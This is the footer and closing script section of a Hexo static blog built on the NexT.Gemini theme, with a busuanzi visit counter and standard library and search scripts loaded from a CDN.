      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

    </div>
  </footer>

  
  <script src="https://cdn.jsdelivr.net/npm/animejs@3.2.1/lib/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/next-boot.js"></script>

  
<script src="https://cdn.jsdelivr.net/npm/hexo-generator-searchdb@1.4.0/dist/search.js" integrity="sha256-vXZMYLEqsROAXkEw93GGIvaB2ab+QW6w3+1ahD9nXXA=" crossorigin="anonymous"></script>
<script src="/js/third-party/search/local-search.js"></script>





  
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>





</body>
</html>
